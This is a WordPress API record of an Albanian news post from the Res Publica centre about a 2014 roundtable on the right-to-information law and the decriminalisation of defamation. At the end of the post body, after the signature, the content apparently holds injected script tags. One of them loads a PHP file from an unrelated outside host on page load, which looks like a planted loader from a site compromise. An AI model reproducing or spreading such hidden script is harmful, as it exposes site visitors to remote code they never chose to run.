{"id":752,"date":"2014-10-01T18:00:41","date_gmt":"2014-10-01T16:00:41","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=752"},"modified":"2014-10-07T16:15:34","modified_gmt":"2014-10-07T14:15:34","slug":"gazetare-dhe-aktiviste-diskutojne-ushtrimin-e-te-drejtes-se-informimit-dhe-dekriminalizimin-e-shpifjes","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=752","title":{"rendered":"Diskutim p\u00ebr t\u00eb drejt\u00ebn e informimit dhe dekriminalizimin e shpifjes"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2014\/10\/2014-09-30-2986.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignleft wp-image-753 size-medium\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2014\/10\/2014-09-30-2986-300x168.jpg\" alt=\"2014-09-30-2986\" width=\"300\" height=\"168\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/10\/2014-09-30-2986-300x168.jpg 300w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/10\/2014-09-30-2986-1024x574.jpg 1024w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/10\/2014-09-30-2986-800x449.jpg 800w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>Qendra Res Publica me mb\u00ebshtetjen e South\u00a0East European Media Observatory dhe t\u00eb partnerit Instituti Shqiptar i Medias,\u00a0n\u00eb dat\u00ebn 30.09.2014 organizoi tryez\u00ebn me tem\u00eb diskutimi: &#8220;Nxitja e ushtrimi t\u00eb t\u00eb drejt\u00ebs s\u00eb informimit dhe dekriminalizimi i shpifjes\u201d. N\u00eb k\u00ebt\u00eb takim mor\u00ebn pjes\u00eb gazetar\u00eb, jurist\u00eb, p\u00ebrfaq\u00ebsues t\u00eb organiztave t\u00eb ndryshme t\u00eb shoq\u00ebris\u00eb civile, t\u00eb cil\u00ebt diskutuan rreth problemeve q\u00eb kishte ligji i m\u00ebparsh\u00ebm p\u00ebr t\u00eb drejt\u00ebn e informimit, risit\u00eb q\u00eb ka ligji i ri p\u00ebr t\u00eb drejt\u00ebn e informimit, i cili \u00ebsht\u00eb miratuar nga parlamenti dhe pritet t\u00eb hyj\u00eb n\u00eb fuqi.\u00a0 Gjithashtu u diskutua rreth problemeve q\u00eb hasin gazetar\u00ebt kur publikojn\u00eb lajme apo opinione, t\u00eb cilat p\u00ebrmbajn\u00eb fakte p\u00ebr funksionar\u00ebt publik\u00eb dhe riskut me t\u00eb cilin ata p\u00ebrballe n\u00ebse kallzohen penalisht p\u00ebr shpifje. Cili \u00ebsht\u00eb impakti q\u00eb ka vepra penale e shpifjes, a ekziston domosdoshm\u00ebria q\u00eb shpifja t\u00eb p\u00ebrb\u00ebj\u00eb vep\u00ebr penale, apo \u00ebsht\u00eb e mjaftueshme p\u00ebrdorimi i padis\u00eb civile, kur pretendohet se \u00ebsht\u00eb c\u00ebnuar reputacioni, dinjiteti, personaliteti i nj\u00eb funksionari public, ishin disa nga pikpyetjet q\u00eb u ngrit\u00ebn n\u00eb takim.<\/p>\n<p>P\u00ebr t\u00eb sqaruar cilat ishin shkaqet dhe arsyet p\u00ebr miratimin e nj\u00eb ligji t\u00eb ri \u201cP\u00ebr t\u00eb drejt\u00ebn e informimit\u201d n\u00eb takim ishte i pranish\u00ebm Z. Genti Ibrahimi, Drejtor Ekzekutiv i Institutit p\u00ebr Studime Publike dhe Ligjore, i cili ka dh\u00ebn\u00eb nj\u00eb kontribut t\u00eb madh n\u00eb hartimin e ligjit t\u00eb ri. Z.Ibrahimi shpjegoi n\u00eb parim disa nga avantazhet e ligjit n\u00eb parim dhe theksoi se p\u00ebrgatitja e nj\u00eb komentari q\u00eb n\u00eb momentin e hyrjes n\u00eb fuqi t\u00eb nj\u00eb ligji merr r\u00ebnd\u00ebsi t\u00eb ve\u00e7ant\u00eb p\u00ebr t\u00eb fiksuar q\u00eb n\u00eb fillim piketat e zbatimit t\u00eb tij.<\/p>\n<p>Nj\u00eb interpretim i detajuar i ligjit t\u00eb ri p\u00ebr t\u00eb drejt\u00ebn e informimit, u prezantua nga Z. Dorian Matlija, Drejtor Ekzekutiv i Qendr\u00ebs Res Publica.<\/p>\n<p>Nj\u00eb panoram\u00eb t\u00eb p\u00ebrgjithshme mbi standartet nd\u00ebrkomb\u00ebtare dhe arsyet e dekriminalizimit t\u00eb shpifjes u prezantuan nga Z.Theodoros Alexandridis, Ekspert p\u00ebr jurisprudenc\u00ebn e Gjykat\u00ebs Europiane p\u00ebr t\u00eb Drejtat e Njeriut.<\/p>\n<p>N\u00eb fund t\u00eb k\u00ebtij takimi Res Publica prezantoi Komentarin e ligjit nr.119\/2014 \u201cP\u00ebr t\u00eb drejt\u00ebn e informimit\u201d, kopje t\u00eb t\u00eb cilit iu shp\u00ebrndan\u00eb pjesmarr\u00ebsve n\u00eb takim.<\/p>\n<p>Mir\u00ebpresim k\u00ebrkesa nga \u00e7do person i interesuar p\u00ebr tu pajisur me nj\u00eb kopje t\u00eb k\u00ebtij komentari.<\/p>\n<p>Res Publica<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Qendra Res Publica me mb\u00ebshtetjen e South\u00a0East European Media Observatory dhe t\u00eb partnerit Instituti Shqiptar i Medias,\u00a0n\u00eb dat\u00ebn 30.09.2014 organizoi [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":753,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,4],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/752"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=752"}],"version-history":[{"count":8,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/752\/revisions"}],"predecessor-version":[{"id":782,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/752\/revisions\/782"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/753"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=752"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=752"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=752"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}